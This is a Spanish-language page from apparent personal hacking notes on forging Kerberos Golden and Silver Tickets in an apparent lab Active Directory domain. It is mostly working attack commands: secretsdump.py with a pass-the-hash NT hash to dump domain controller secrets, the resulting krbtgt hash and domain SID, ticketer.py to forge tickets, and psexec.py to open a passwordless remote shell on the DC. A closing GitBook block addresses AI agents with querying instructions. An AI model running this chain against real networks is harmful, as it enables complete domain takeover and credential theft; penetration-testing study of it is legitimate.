> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/active-directory/lateral-movement/kerberos-golden-ticket-and-silver-ticket.md).

# Kerberos Golden Ticket y Silver Ticket

El objetivo es forjar nuestros propios tickets de Kerberos.

Para hacer esto, comenzamos recuperando los secretos necesarios del controlador de dominio.

{% code overflow="wrap" %}

```bash
secretsdump.py administrador@172.16.0.100 -hashes :a87f3a337d73085c45f9416be5787d86 
```

{% endcode %}

<figure><img src="/files/7516f6509c5bf434385bc5bd88e8477158ee50f0" alt=""><figcaption></figcaption></figure>

Aquí recuperamos el hash de la `krbtgt` cuenta.

* 2ebd06648a79ae82327c33648b68aa82

<figure><img src="/files/0faf3c524dc4b4943e7122068b5099cb73d074e1" alt=""><figcaption></figcaption></figure>

También recuperamos el `SID del dominio`.

{% code overflow="wrap" %}

```bash
Get-ADDomain
```

{% endcode %}

* S-1-5-21-3587670147-487768648-1292400310

<figure><img src="/files/21e406ea76c5f49ae24da3f49a46f8c05c99bddc" alt=""><figcaption></figcaption></figure>

Con `ticketer.py` podemos generar un Ticket Dorado para esta cuenta.

{% code overflow="wrap" %}

```bash
ticketer.py -nthash 2ebd06648a79ae82327c33648b68aa82 -domain-sid S-1-5-21-3587670147-487768648-1292400310 -domain whoami.local administrador
```

{% endcode %}

Luego cargamos este ticket en la caché local de Kerberos.

{% code overflow="wrap" %}

```bash
export KRB5CCNAME=/home/jordan/administrador.ccache
```

{% endcode %}

<figure><img src="/files/e0cdcb4b525f272e165985a8d159dd3ac70095a7" alt=""><figcaption></figcaption></figure>

Una vez cargado el ticket, podemos iniciar sesión de forma remota sin contraseña.

{% code overflow="wrap" %}

```bash
psexec.py whoami.local/administrador@DC01.whoami.local -k -no-pass
```

{% endcode %}

<figure><img src="/files/2c2d96f88d19b1f366b859dd40901f8e4d0e1e81" alt=""><figcaption></figcaption></figure>

Para generar un Ticket Plateado, el principio sigue siendo el mismo, pero el ticket es para un servicio específico.

{% code overflow="wrap" %}

```bash
ticketer.py -nthash 2ebd06648a79ae82327c33648b68aa82 -domain-sid S-1-5-21-3587670147-487768648-1292400310 -domain whoami.local -spn cifs/DC01.whoami.local administrador
```

{% endcode %}

<figure><img src="/files/eaac9a579bbec85ceaafc8cc03a6669e37f29d73" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/active-directory/lateral-movement/kerberos-golden-ticket-and-silver-ticket.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
